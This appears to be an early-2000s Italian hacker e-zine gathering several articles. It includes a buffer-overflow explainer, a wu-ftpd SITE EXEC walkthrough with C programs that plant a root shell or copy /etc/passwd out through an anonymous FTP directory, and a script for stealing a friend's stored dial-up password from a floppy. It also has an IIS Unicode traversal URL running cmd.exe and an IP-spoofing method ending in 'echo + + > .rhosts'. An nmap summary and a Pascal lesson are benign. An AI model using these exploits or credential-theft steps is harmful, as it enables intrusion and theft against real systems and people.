[ebp][0FFFFFA4C] push edi push ecx push eax call [edx + C] <-- possible call to code. and eax seems to be loaded with a seemingly random value when the fault occurs. If EAX is somehow controlled, or happens to be our magic value, I assume running arbitary code is quite possible, as the url is decoded and stored in binary format in memory, although I am unsure as CS <> SS, and I'm not sure exactly where in memory it is stored. Shane Come potete vedere le possibilità sono diverse e quel "running arbitrary code" è decisamente intrigante. ;) /* Stack or Buffer Overflow */ Ho raggruppato questi due overflows perchè il concetto alla base degli exploit è simile x tutti e 2. Questo bug riguarda i sistemi UNIX e similari e sfrutta la possibilità di alcuni programmi eseguire del codice presente nello stack.Alcuni progs,infatti,hanno il bit SUID settato, tipo "passwd",ovvero, per la durata del programma, chiunque lo usi ha la user ID del proprietario.Ora, se il proprietario è il "root", capirete che l'utente può effettuare liberamente qualsiasi operazione sui file.In teoria,però,se noi eseguiamo un programma in modalità root,possiamo solo fare le operazioni permesse da quel programma...in teoria... Immaginiamo invece di poter cambiare il codice eseguito in modalità superuser,x esempio riuscendo a lanciare una shell,questa avrebbe un bel #. Es: #define dimensione 1024 void funzione (char *argomento) { char parametro[dimensione]; /* con questo facciamo una copia del rimo argomento */ strcpy(parametro,argomento); /* qui invece operiamo sulla copia */ .... return; } main(int argc, char **argv) { /* e qui possiamo eseguire operazioni sul primo parametro */ funzione(argv[1]); } Questo programma, tramite la funzione "funzione", processa il primo argomento passato al programma;l'array "parametro" è di dimensione =1024 byte.La stringa "argomento" viene ricopiata sopra "parametro", senza però controllare la lunghezza.Quindi se "argomento" fosse una stringa di lunghezza > 1024 byte, andremmo a sovrascrivere impropriamente delle locazioni di memoria.Si sa,infatti, che le variabili locali di una funzione vengono allocate sullo stack,subito dopo l'indirizzo di ritorno,ecco uno schema al riguardo: indirizzi <- | variabili | indirizzo | argomenti passati | -> indirizzi bassi | locali | di ritorno | alla funzione | alti Ora, ecco lo stesso schema con la varabile locale array "parametro" di 1024 byte: indirizzi <- | 1024 byte | indirizzo | argomenti passati | -> indirizzi bassi | "parametro" | di ritorno | alla funzione | alti Riguardando il primo listato,si vede che "funzione" ricopia la stringa "argomento" sopra l'array "parametro".Facendo in modo che la stringa "argomento" sia più lunga di 1024 byte, la stringa andrebbe a sovrascrivere il resto dello stack,indirizzo di ritorno x primo, poi gli argomenti, via via verso gli indirizzi più alti.( ricordate,però,che non deve esserci controllo dele lunghezze ). Es: prima dello strcpy() : indirizzi <- | 1024 byte | indirizzo | argomenti passati | -> indirizzi bassi | "parametro" | di ritorno | alla funzione | alti dopo lo strcpy(); indirizzi<-| i primi 1024 | i byte | i byte dal 1028 | -> indirizzi bassi | byte di | dal 1024 e 1027 | al 1199 (l'ultimo) | alti | "argomento" | di "argomento" | di "argomento" | | dal #0 a #1023 | che sovrascrivono| che sovrascrivono | | | l'indirizzo di | il resto dello | | | ritorno a 32 bit | stack | All'uscita della funzione, il programma non tornerà nel main() subito dopo la chiamata, ma salterà all'indirizzo puntato dai byte 1024-1025-1026-1027 di "argomento", che hanno sostituito l'indirizzo di ritorno nello stack.In quei 4 byte noi potremmo mettere la porzione di codice che vogliamo venga eseguita.Se,ad esempio, come argomento al programma passiamo una stringa che contiene (in linguaggio macchina) del codice eseguibile nei byte 0-1023 e l'indirizzo di dove questo codice si troverà in memoria nei byte 1024-1027, all'uscita della funzione il processore andrà ad eseguire il nostro codice. Se il nostro codice tramite una chiamata "execlp()" lancia una shell, questa shell avrà i diritti "root",con la quale potrete dare sfogo alle vostre voglie represse :PP L'unico problema è che dobbiamo sapere a quale indirizzo verrà messo il nostro argomento e, naturalmente, usare programmi che non controllano la grandezza delle stringhe. Naturalmente basterebbe al programmatore più attento settare la dimenisone del buffer con "bufsize" oppure ricorrendo a stackguard,basato sul concetto che se il buffer overflow sovrascriverà lo stack,dovrà x forza passare sopra una parte dello stack,chiamato [canary] un semplice numero casuale settato all'avvio.Il numero,infatti, verrà salvato anche in una posizione lontana dallo stack,quindi se il buffer passerà sopra il canary, il suo numero sarà diverso dalla copia salvata in una porzione "sicura".Calcolate che le possibilità di beccare il numero relativo al [canary] equivale a 2 alla 32esima,fate un po' voi... Qui sotto metto lo schema dello stack,prima e dopo l'utilizzo di stackguard. |local variables| |frame pointer| |instruction pointer| |local variables| |canary| |frame pointer| |instruction pointer| Avrete quindi notato che se avete la fortuna di trovare programmi che non utilizzano stackguard o che non effettuano altri metodi di buffer overflow detection, l'utilizzo di questo exploit è relativamente facile. That's all folks! Enjoy {Cujo} ··················································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ __ _|_ _|_ __ __) (__| ___ \_' __ | __ o _|_ (__(__) (__(_ | |_, |__) (___ (O) | (__/_ / \ |__) |_, (__) | |_, | ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: WU-FTP 2.4(1) EXPLOIT] [Autore: Jrash] [Consumo: merendine e panini al salame....] [Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!!] Holaga,premetto he questo articolo non lo ho scritto io, ma lo ho trovato modificato, dato che lo trovavo interessante lo ho inserito nella rivista.Non conosco l'autore ufficiale, se si facesse vivo mi farebbe un piacere!!!!! :) Scrivo questo articolo non perche' io pensi che tutti voi non conosciate il bug che c'e' nel wu-ftp 2.4(1), ma perche' mi sono rotto le palle di sentir dire che e' un exploit che si puo' usare solo da locale... BALLE!!!!!!!!! Se ci sono certe condizioni, il bug del wu-ftp 2.4(1) puo' essere utilizzato anche per ottenere root da remoto!!!!! Vediamo un po' come si fa: Iniziamo con la versione "normale", cioe' quella che si trova da tutte le parti, sul wu-ftp 2.4(1) bug. Allora, come prima cosa, create un programmino che copi la shell nella directory tmp (o dove vi pare) e che la renda eseguibile da chiunque, poi compilatelo nel sistema che volete hackare. Il programmino potrebbe essere questo: shell.c -----------tagliate qui------------ #include #include #include main() { seteuid(0); system("cp /bin/sh /tmp/.sh"); system("chmod 6777 /tmp/.sh"); system("chown root /tmp/.sh"); system("chmod 4755 /tmp/.sh"); system("chmod +s /tmp/.sh"); } -----------tagliate qui------------ Quindi, collegatevi con ftp al vostro sito e loggatevi con il vostro user e passwd... 220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. Name (exploitablesys:root): goodaccount 331 Password required for goodaccount. Password: (password) 230 User goodaccount logged in. Remote system type is UNIX. Using binary mode to transfer files. Quindi scrivete: ftp> quote site exec bash -c id Se vi risponde qualche cosa di questo tipo vuole dire che e' buggato: 200-bash -c id 200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users) 200 (end of 'bash -c id') Se e' buggato non dovete fare altro che scrivere: ftp> quote site exec bash -c /la/tua/home/dir/shell 200-bash -c /la/tua/home/dir/shell 200 (end of 'bash -c /la/tua/home/dir/shell') ftp> quit 221 Goodbye. Per avere nella dir tmp la shell di root. OK, ricapitolando, questo bug e' "etichettato" come compromettente solo per locale per 2 motivi: 1) Vi ci vuole un account per collegarvi ed eseguire la shell nella dir /tmp. 2) Dovete compilare il programmino sul sistema che volete hackare. Ma a tutto questo si puo' ovviare :) Innanzitutto, il sistema da attaccare deve concedere l'anonymous login per l'ftp, cosi' potete loggarvici dentro e vedere se e' buggato. Poi dovete vedere se il vostro bersaglio ha una dir scrivibile (in genere /incoming) Poi, dovete vedere in che dir del sistema remoto e' posto l'ftp /home/ftp per Linux /var/ftp oppure /etc/ftp per gli altri Quindi dovere modificare a seconda delle vostre esigenze il programmino seguente, compilarlo e inviarlo nella directory scrivibile del vostro sistema da attaccare: -----------tagliate qui------------ #include #include #include main() { seteuid(0); system("cp /etc/passwd /home/ftp/incoming/h"); system("chmod 755 /home/ftp/incoming/h"); } -----------tagliate qui------------ Poi con la maniera descritta sopra lo fate eseguire dal Wu-ftp, e vi ritrovate con il file h che contiene le passwd del sistema. N.B.: Ricordatevi di cambiare il percorso /etc/passwd con il percorso del vostro file delle passwd ;) Quindi non avete altro da fare che scaricarlo e crackare qualche account per poi collegarvi al sistema e sfruttare nuovamente il bug di wu-ftp (questa volta nella maniera classica ;) per diventare root. Naturalmente ci puo' essere qualche problema utilizzando questo metodo perche' il programma gia' compilato da voi e uploadato sul sistema bersaglio puo' non funzionare, inutile dire che per cercare di ovviare a questo inconveniente dovete cercare di compilare il suddetto programmino su un sistema che e' il piu' possibile simile a quello che provate ad hackare. Un altro problemino e' che nella dir /incoming ci rimane il file h, che contiene il file delle passwd del sistema, e quindi se il sysadm lo vede puo' cominciare a sospettare qualche cosa..... Pero', se crackate subito qualche account e poi diventate root non ci sono problemi, lo togliete subito. Se pero' le passwd sono difficili da crackare e vedete che per trovare un account vi ci vuole piu' del previsto (cosa parecchio, ma parecchio rara perche' se un sito ha il bug del wu-ftp vuol dire che il livello di sicurezza non e' molto alto) basta che vi compiliate un altro programmino che toglie h e tutti i prog che avete inviato dalla dir /incoming e lo facciate eseguire sempre con il wu-ftp. Non sto a mettere un esempio del programmino perche' non ho voglia e perche' penso che se non siete capaci di farlo da soli e' meglio che non diveniate root su qualche sistema :) Cmq, se proprio ci tenete a non lasciare momentaneamente file compromettenti nella dir /incoming del sito che attaccate, spediteci questo programmino al posto di quello precedente (compilato naturalmente ;) che, invece di copiare tutto il contenuto del file delle passwd, lo mostra. -----------tagliate qui----------- #include #include #include main() { seteuid(0); system("cat /etc/passwd"); } -----------tagliate qui----------- Pero' il problema principale del metodo descritto qui sopra e' un altro .... Per capirlo bene e' necessario spiegare un po' meglio come funge l'exploit descritto sopra. Innanzitutto il bug sta nel fatto che il site exec ha (di default) come PATH di esecuzione /bin per gli utenti registrati, (quindi consente di fare praticamente tutto) e non controlla il reale uid e gid di chi esegue il comando prima di farlo, quindi praticamente e' come se passaste i comandi come root. Il fatto pero' e' che quando vi collegate come anonymous vi prende come PATH di esecuzione non /bin ma /home/ftp/bin (nel caso di linux), che in genere e' una dir non scrivibile e che non contiene programmi che possono servire come ad esempio la bash. Quindi a meno di settaggi clamorosi della dir /home/ftp/bin/ come ad esempio la capacita' di poterci uploadare roba, oppure di contenere la shell, se fate il SITE EXEC bash -c id non otterrete nulla. Comunque, si puo' sempre ovviare a questo e sfondare da remoto, se ci sono certe condizioni: 1) la dir /home/ftp/bin contiene il comando tar 2) ho una dir scrivibile dove mettere file 3) posso fare un site chmod Funziona cosi': Mi faccio un programmino che fa un seteuid(0), chiama chmod(0755, "/home/ftp/bin") e copia lo std input nello std output. Poi lo inviate nella dir scrivibile insieme a dei file compressi con il tar che contengono una shell linkata staticamente (se no quando la eseguite con il site exec non va perche' cerca i vari file /lib/lib.so etc etc) e i programmi di cui avete bisogno. Poi scrivete: site exec tar --use-compress-program /incoming/hack -xf /incoming/programmi_miei.tar Questo dovrebbe estrarre i vostri file nella directory /home/ftp/bin consentendovi cosi' dopo di chiamare la shell che avete messo in programmi_miei.tar e di utilizzare il site exec con quella shell per lanciare i vari programmini presentati sopra per prendervi il file delle passwd. Vorrei salutare tutti quelli che mi conoscono, soprattuto i miei amici di crew A[v]a[t]A[r] e syn.....byezzz....... _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- w w w . u m c r e w . t s x . o r g _-_-_-_-_-_-_-_-_-_-[Jrash]° ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ _|_ __ _|_ _|_ ___ __ ___ | ___ __ __ __ __ | (__) |_, |_, (__/_ | ' (__/_ |_, (__/_ |__) (__( __) __) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: fottere le password in Linux] [Autore: FeltonSpray] Disclaimer Credo che su questo articolo non ci sia bisogno di un disclaimer beh sicuramente non è una bella azione rubare le pass del tuo amiko o del tuo migliore amico ma a noi non c'e ne frega un CAZZO! Se volete fare i bastardi fatelo senno mi sa che è inutile che leggete sto TXT Cmq io ve lo spiego lo stesso fate come volete! Ciao ragazzi e benvenuti nel mio nuovo articolo!! =) Quindi dato che io non sono un maestro di linux mi sono messo un pò a cercare tutti i suoi file qundo ho notato uno in cui si trova su una cosa carina eheh /home_utente/.kde/share/config/kppprc voi direte: A me cazzo frega??? Hehehe beh qui si trovano tutti i dati contenuti nel kppp quindi tutti i dati di connessione e la passwd è scritta in chiaro!!! Hehhe andiamo con ordine: Kppp in linux gestisce la connessione remota semplificando tutta la procedura testuale con una grafica di facile intuizione ma naturalmente per ricordarsi i dati li deve pure registrare da qualche parte.... beh cercando ho trovato il file sopra riportato che contiene tutto il settagio =). Beh ma per fare questo dovete lavorare da locale quindi... andate da qualche vostro amiko che uso linux possibilmente non da molto =) e data la vostra esperienza (hhihi) lo volete aiutare quindi noi ci creiamo un semplice script che poi ci aiuterà in seguito, facciamo tutto con ordine, vi spiego tutti i passagi eheheh: 1) Uscite di casa vostra ed andate a casa sua =) (heeh vi devo spiegare anche questo???) 2) Suonate il suo citofono e possibilmente evitate di dire c'è GIGI?? hihih 3) Salite a casa sua e cominciate a fare gli espertoni di linux 4) Chiedete un bicchiere d'acqua (mò vi spiego hihihi) 5) Mentre lui va di là a prendere sto bicchiere d'acqua uscite il vostro bel dischetto e inseritelo ***Pensioro di FeLtOnSpRaY... "L'amiko è rimasto fottuto per il bicchier d'acqua UAHAHAHA" Fine Pensiero*** 6) Heheh secondo voi che dovete fare??? eheheheh 7) Non c'è nessun punto 7 =) Beh ma voi dite: Che cazzo ci dovevo mettere nel disketto?? E presto detto... Dovete creare uno script di 3 righe che vi semplifica la vita con questo codice: #!/bin/bash echo Mò gli fotto le pass... hehehe =) !!! cp /root/.kde/share/config/kppprc /mnt/floppy/passFottute.txt Tutto quì beh se il vostro amiko e mezzo furbo da non entrare come root createvene tanti a casa di sti script con varie diciture tipo se si chiama asdrubale mettete..... /asdrubale/.kde/share/config/kppprc /mnt/floppy/passFottute.txt eheheh tutto qui. Ascoltate sò che non ve ne fate un cazzo di un login per un provider visto che si possono registrare gratis ma provate a far camminare il cervello due secondi.... gli utenti medio stupidi non si mettono a ricordarsi 30.000 pass quindi quella potrebbe coincidere con molte cose tipo la pass del suo sito, oppure la pass della sua e-mail oppure la pass della sua cassaforte =) hehe. Beh adesso credo propio che ho finito quindi chiudo e vi raccomando di volermi bene =) e di scrivermi qualsiasi sia il problema (civile, penale, consigli sul sesso,) heeheh beh apparte gli scherzi per info, approfondimenti, consigli, errori, o altro... feltonspray@katamail.com http://spazioweb.inwind.it/feltonspray/ oppure mi cercate su C6 con il nick feltonspray oppure su irc.azzurra.it #ahccc #h4ck-italia #hackersonline Ciauz a presto by FeLtOnSpRaY ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _|_ _|_ _|_ __ __ __ __ __ __ __ |_, (__(_ |_, |_, (__) __) (__(_ | ) | ) ) (__( |__) | ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: TUTTO SU "NMAP"] [Autore: Jrash^^] [Crew : UMc's member] [E-mail: jrash@hackersat.com] Nome nmap - Strumento di esplorazione della rete e scanner della sicurezza Sintassi nmap [Tipo(i) di scan] [Opzioni] Descrizione Nmap è disegnato per permettere ai sysadmin ed a individui curiosi di scannerizzare grosse reti per determinare quali host sono attivi e quali servizi offrono. Nmap supporta un gran numero di tecniche di scan come per esempio: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), Reverse-ident, ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, e Null scan. Leggete la sezione tipi di scan per maggiori dettagli. Nmap offre anche molte funzioni avanzate come il detect del sistema operativo da remoto via TCP/IP fingerprinting, stealth scanning, dynamic delay e retrasmission calculations, parallel scanning, detect degli host 'down' con il parallel ping, decoy scanning, detect di port filtering, RPC scanning diretto (non-portmapper), fragmentation scanning e specificazione flessibile di target e host. Uno sforzo significativo è stato messo per ottenere una performance decente di nmap per gli users non-root. Sfortunatamente molte interfacce critiche del kernel (come i raw sockets) richiedono i privilegi di root. Nmap deve essere usato da root, quando possibile. Il risultato di eseguire nmap è di solito una lista di porte interessanti della macchina (o delle macchine) scannerizzate. Nmap dà sempre il nome del servizio 'well known' (entro le prime 1024 porte?), numero, stato e protocollo. Lo stato è sia 'open' (aperto) che 'filtered' (filtrato) che 'unfiltered' (non filtrato). 'Open' significa che la macchina scannata accetterà connessioni su quella porta. 'Filtered' significa che un firewall, un filtro o un altro ostacolo di rete copre la porta e previene nmap dal determinare se la porta è aperta. 'Unfiltered' significa che la porta è conoscita da nmap come chiusa e nessun firewall o filtro sembra interferire con i tentativi di nmap di stabilirlo. Le porte 'unfiltered' sono casi comuni e vengono mostrate solo se la maggior parte delle porte scannate sono in stato di filtering. Dipendentemente dalle opzioni usate, nmap può inoltre riportare le seguenti caratteristiche dell'host remoto: Sistema Operativo (OS) in uso, capacità di azzeccare la sequenza TCP, username di quelli che eseguono i programmi che hanno il bound su ogni porta, il nome DNS, se l'host e' uno smurf address, e alcune altre. Grazie per l'attenzione! Vorrei fare un saluto ai miei cari amici di IRC dado ed angelocattivo; inoltre saluto tutti i membri dell H@team e la mia adorata Giada.......BiEzZ.....lol 18/03/2001 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>jrash@hackersat.com<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[Jrash]° ··············································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× o __ __ |__ __ __ | __) __) |__) (__(_ (__| __) __/ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: ISS Bugs] [Autore: Ulisses1] Beh... allora.. vediamo un po' i bugs che ricordo nel server iis... Bug1) Ida.ida Diciamo di voler testare l'esistenza della cartella /ciao/ nel server www.atlantide.it come facciamo? http://www.atlantide.it/ciao/ida.ida la risposta sarà: File ida.ida. The system cannot find the path specified. ciò vuol dire che non è stata trovata tale cartella. Proviamo ora invece a cerkare la cartella /libro/ http://www.atlantide.it/libro/ida.ida La risposta sarà: The IDQ file ida.ida could not be found. Evviva la cartella esiste!! Questo bug può essere applicato per trovare cartelle abbastanza importanti, like: /admin/, /IISADMIN/, ecc.. Bug2) RDS bug, come funziona? http://www.esempio.it/msadc/msadcs.dll Content-Type: application/x-varg Content-Length: 6 W€ Se otteniamo questa risposta è presente il bug rds, per cui con particolari toolz per linux, reperibili su http://packetstorm.securify.com , possiamo agire liberamente sul server. Bug3) Estensioni FrontPage non passwordate Bene... questo è un vekkissimo bug, ormai sono pokissimi i server i cui è ancora presente, ma non è impossibile trovarne. prendiamo il solito esempio www.esempio.it e apriamo front-page, è presente nella barra degli strumenti, modifichiamo la pagina e poi salviamola con nome. ad esempio se l'index del sito è www.esempio.it/index.html sarà questo il nome che le daremo. Andando su www.esempio.it troveremo la pagina da noi inserita e non l'originale. Bug4) Unicode http://www.esempio.it/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Tramite questa stringa è possibile eseguire comandi arbitrari sul server vittima Sembra funzionare perfettamente su sistemi iis4/5 Beh.. questi sono i bugs principali e più conosciuti, ne sono stati scoperti altri che riporterò più in la... per ora auguro buona fortuna a tutti.. Ulisses1 ··············································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ o __ __ __ __ __ _|_ o __ __ | |__) __) |__) (__) (__) | | | ) (__| | | __/ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: IP Spoofing] [Autore: Cujo] Eccomi qui a esporre un argomento di cui avrete sentito parlare molto e , probabilmente,avrete letto altrettanto.Questo articolo,però,cerca di entrare un po' più nello specifico,integrando il concetto di ip spoofing con quello di tcp hijacking che sfrutta,appunto, i bugs del protocollo tcp e del 3 Way handshaking. /* Ip Spoofing In uno scambio di dati attraverso tcp/ip, l'identificazione delle parti interessate alla comunicazione avviene attraverso i 4 byte che costituiscono l'indirizzo ip di ciascuna di esse. In mancanza di sistemi di autenticazione più sofisticati (come Kerberos, sviluppato al MIT), l'indirizzo ip costituisce l'unica garanzia che la macchina con cui parliamo sia veramente chi dice di essere. Ora, forgiare datagrammi con un indirizzo ip falso non è difficile (bastano i diritti di root e poche linee di codice C) e utilizzando come mattone questa tecnica, nota come ip spoofing, è possibile congegnare attacchi molto potenti che sfruttano proprio la mancanza di algoritmi di autenticazione sicuri. L'utilizzo dello spoofing è sufficientemente semplice con protocolli sessionless, quali udp e icmp ma, con un po' di lavoro in più, è possibile andare all'assalto anche di un protocollo session-oriented come tcp. Un esempio è il tcp spoofing,che necessita della presenza di una relazione di trust, in cui un certo host accetta comandi (con rsh) e login remote (con rlogin) da un altro computer senza richiedere password, facendo affidamento solo sull'indirizzo ip riportato nei pacchetti ricevuti.Ad esempio: l'host A accetta comandi da B senza richiedere password e X sfrutterà proprio questa relazione di trust impersonando B nell'instaurare una connessione con A e inviando un comando del tipo: echo "+ +" > ?/.rhosts Questo comando estenderà tale relazione di trust a qualsiasi host in rete, ponendo A sotto il completo controllo di X (il file .rhosts indica chi non deve fornire password per effettuare il login e grazie all'istruzione"+ +" noi indichiamo "tutti".) Quello che rende le cose un po'' complicate sono i sequence number: tutti i segmenti tcp sono numerati (in realtà sono i byte del payload ad essere numerati,in modo che chi li riceve possa verificare che tutti i dati inviati siano giunti a destinazione e, in caso ciò non sia avvenuto, si possa chiedere una nuova trasmissione dei pacchetti mancanti. Più precisamente, ogni pacchetto p ha i seguenti due campi di 32 bit : SEQN (sequence number): numero del pacchetto p ACKN (acknowledgement number): numero dell'ultimo pacchetto ricevuto dal mittente di p, aumentato di un'unità Ogni host X tiene traccia di questi numeri allocando due contatori SEQN(X) e ACKN(X) per ogni connessione e incrementandoli man mano che i pacchetti partono e arrivano. Il primo riporta il numero del prossimo pacchetto da spedire mentre il secondo si riferisce al prossimo da ricevere . 3 Way Handshaking Il 3-Way handshaking serve proprio a sincronizzare questi contatori tra i due host che partecipano alla stessa connessione: i segmenti con il tag SYN attivato hanno infatti lo scopo di comunicare all'interlocutore il valore iniziale del sequence number per quella connessione, mentre gli ACK di ritorno permettono di verificare che i pacchetti spediti siano stati ricevuti con successo. Il difficile sta nel fatto che quando X comincia il collegamento mandando ad A un SYN che afferma di provenire da B, il SYN/ACK in risposta sarà ovviamente diretto a B. X, a meno di poter sniffare la comunicazione tra A e B, non potrà vedere il sequence number iniziale di A e instaurare la connessione, visto che se l'ACKN del terzo pacchetto dell'handshaking non corrisponde a quello atteso (e cioè al SEQN del secondo aumentato di uno), verrà scartato. La soluzione sta nell'indovinare il sequence number iniziale di A. Ora,le implementazioni dello stack tcp/ip fanno sì che i sequence number siano abbastanza prevedibili. Nella maggior parte dei casi il sequence number iniziale viene preso da un contatore incrementato periodicamente (di solito 128.000/sec) e, ulteriormente, ad ogni nuova connessione (di solito di 64.000). L'attaccante, quindi, deve solo mandare un certo numero di ping ad A per misurare il tempo medio di round-trip r dei pacchetti, cominciare un handshaking (non spoofed) per leggere il valore attuale del contatore e, subito dopo, può iniziare l'attacco vero e proprio ), utilizzando come ACKN verso A (pacchetto n.3) il sequence number ricevuto dalla connessione precedentemente iniziata, aumentandolo nel nostro esempio di 64.000+128.000*r+1. Se la stima è precisa, con un numero non troppo elevato di tentativi sarà possibile indovinare il numero giusto, completare la connessione e poi inviare il comando desiderato, sicuri del fatto che A sarà felicemente convinto che tale istruzione provenga dal server B. Se le cose sembrano già abbastanza complicate, va aggiunto che non bisogna dimenticarsi del SYN/ACK che A manderà a B. Se tale pacchetto giunge a destinazione, B risponderà con un RST che chiuderà la connessione. Per evitare che ciò accada è sufficiente un SYN flooding contro B, in modo da riempire la sua backlog e far sì che il SYN/ACK di A vada perso. */ Presumo che abbiate le idee un pochino confuse,comunque basta rileggersi un paio di volte l'articolo x capire meglio,oppure leggersi un bel rtf sul protocollo tcp/ip.Nel prossimo numero completerò l'articolo aggiungendo il tcp hijacking,dato che fino a qua ho parlato di "blind spoofing",xchè l'host X (noi) non può sniffare il traffico passante tra A e B.Logicamente se noi siamo sullo stesso segmento di rete dei due hosts,magari una rete ethernet,possiamo fregarcene di provare a indovinare i sequence numbers,e prendere il controllo della connessione tra A e B,utilizzando il tcp hijacking.Tutto questo,però,nel prox numero,dato che bisogna introdurre concetti nuovi,e l'articolo appena letto è già abbastanza pesantuccio ;) {Cujo} ___________________________________________________________ ____________________________________________ | _____ _____ _____ _____ _____ ___ ___ ___ ___ ___ _ __ _ _____ | | | _ \ | _ \ / _ \ / ___| | _ \ / | / |/ | / |/ | | | | \ | | / ___| | | | |_| | | |_| | | | | | | | | |_| | / /| | / /| /| | / /| /| | | | | \| | | | | | | ___/ | _ / | | | | | | _ | _ / / / | | / / |__/ | | / / |__/ | | | | | |\ | | | _ | | | | | | \ \ | |_| | | |_| | | | \ \ / / | | / / | | / / | | | | | | \ | | |_| | | | |_| |_| \_\ \_____/ \_____/ |_| \_\ /_/ |_| /_/ |_| /_/ |_| |_| |_| \_| \_____/ | -------------------------------------------------------------------------------------------------------- ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ __ __ __ | __ __ __ _|_ ___ __) |__) (__( __) (___ (__( |_, |__) (__( | ' |_, (__/_ (___ | | ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Pascal (Parte 2)] Autore: _______________________________________ EvilAngel Tempo di scrittura: ___________________________ 10 minuti(1^ parte) 20 minuti(2^ parte) Consumo: ______________________________________ 3 caramelle al caffè 1 bottiglia di coca riempita d'acqua Saluti: _______________________________________ stanno alla fine Ok, dopo aver spiegato le basi, passiamo alla TEORIA. Tutto ciò che dirò in questa lezione, è puramente per creare delle basi per la logica della programmazione. (Ehy, non è un disclaimer, è solo una descrizione!). Allora, possiamo dire che, per realizzare un programma in TP, usiamo l'ALGORITMO TOP-DOWN. Azzo è? Un algoritmo è un tipo di programmazione, in particolare, il top-down consiste nello scomporre il progetto iniziale in tanti sottoblocchi (nel nostro caso le procedure), facilitando il lavoro. Ad esempio, per fare un programma che calcola la somma di due numeri, possiamo cominciare a fare un programma principale (o MAIN PROGRAM) in questo modo: Program somma; Uses crt; var ....... begin Inserisci_numeri; Somma_numeri; Visualizza_risultato; repeat until keypressed; end. Sicuramente vi chiederete come fa il programma a interpretare comandi tipo Inserisci_numeri o simili. Non sono comandi, sono procedure che realizzeremo prima del main program. Ad esempio, un ipotetica procedura Inserisci_numeri potrebbe essere: Procedure Inserisci_numeri; var ....... begin clrscr; writeln('Inserisci il primo valore'); readln(a) writeln('Inserisci il secondo'); readln(b); end; Tutto qui? Perchè non li sommiamo pure, e facciamo tutto insieme? Fin quando il programma è piccolo, le procedure sono utili relativamente, ma quando il programma si fa pesante, è bene usare procedure per ottimizzarne la scrittura. Un'altra cosa a proposito delle variabili e delle procedure: Ci sono due tipi di variabili. Possiamo, infatti, usare una variabile in una sola procedura, per cui, per limitare lo spazio di memoria occupata, la definiamo nella procedura stessa. Però, se volessimo richiamare una variabile presente in un altra procedura non inizializzata nel main program o nella procedura dove stiamo lavorando, non potremo farlo. E ora passiamo alle procedure. Le procedure possono assumere dei PARAMETRI. I parametri sono delle variabili che immettiamo nel main program dopo aver richiamato la procedura, tra parentesi tonde. Ad esempio: Inserisci_numeri(a,b); Che succede? In questo modo, a e b sono diventate PARAMETRI della procedura. Se, infatti, facessimo una procedura: Procedure Somma_numeri(var a,b:integer); var ..... begin c:=a+b; end; ...avremmo un tipico esempio di procedura con parametri. In questo caso, se scrivessimo: Somma_numeri(1,5); faremmo in modo che C abbia il valore di 6. Se nel corso della procedura facciamo variare il valore dei parametri, dobbiamo scrivere VAR nelle parentesi, altrimenti basta scriverne il nome e il tipo. NOTA: i parametri devono essere dichiarati nel main program come variabili effettive. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ STRUTTURE Arieccome. Ora sono pronto ad affrontare un altro argomento, le strutture di un programma. Esse possono essere di tre tipi: SEQUENZIALE, CONDIZIONALE o ITERATIVA. Se facciamo un programma come questo: begin writeln('inserisci un numero'); readln(n); q:=sqr(n); writeln('Il suo quadrato è ',q); end. avremmo una struttura di tipo SEQUENZIALE, ovvero quando tutti i comandi vengono eseguiti in un ordine prestabilito, uno dopo l'altro. Invece, possiamo metterci delle condizioni, mediante l'uso della coppia IF...THEN. In questo modo, se si verificano le condizioni indicate dopo IF, si prosegue a eseguire i comandi dopo il THEN. Nel caso volessimo far eseguire dei comandi quando la condizione NON SI VERIFICA, dopo il codice che segue il THEN, inseriamo la parola ELSE, seguita dai comandi da eseguire. NOTA: Nel caso ci sia più di una istruzione da eseguire, bisogna determinale l'area di programma da eseguire nel caso la condizione diventasse vera, usando BEGIN e END, come se fosse una piccola procedura. Inoltre, bisogna notare che END, in questo caso, dev'essere seguito dal punto e virgola (;). Procediamo con un esempio. begin writeln('Inserisci un numero'); readln(n); IF n>0 THEN BEGIN rad:=sqrt(n); writeln('la radice del numero immesso è ',rad); END; ELSE writeln('Errore'); end. E questa era la struttura CONDIZIONALE. Un altro tipo di struttura è quella ITERATIVA, ovvero a cicli. Un ciclo è una situazione in cui è necessario eseguire più di una volta un certo codice, fino al raggiungimento di una condizione che fa uscire il programma dal ciclo. Ci sono diversi tipi di cicli, i più famosi sono REPEAT...UNTIL, FOR.... DO, e WHILE...DO. Esaminiamo prima il ciclo WHILE. la sintassi è WHILE condizione DO comandi I comandi, se più di uno, devono essere delimitati da BEGIN e END (seguito dal ";"). Il ciclo continua finchè la condizione è vera, e quando è falsa ne esce, continuando il programma. Di solito, si usa una variabile CONTATORE, che si incrementa ogni volta che si esegue il ciclo, e la condizione 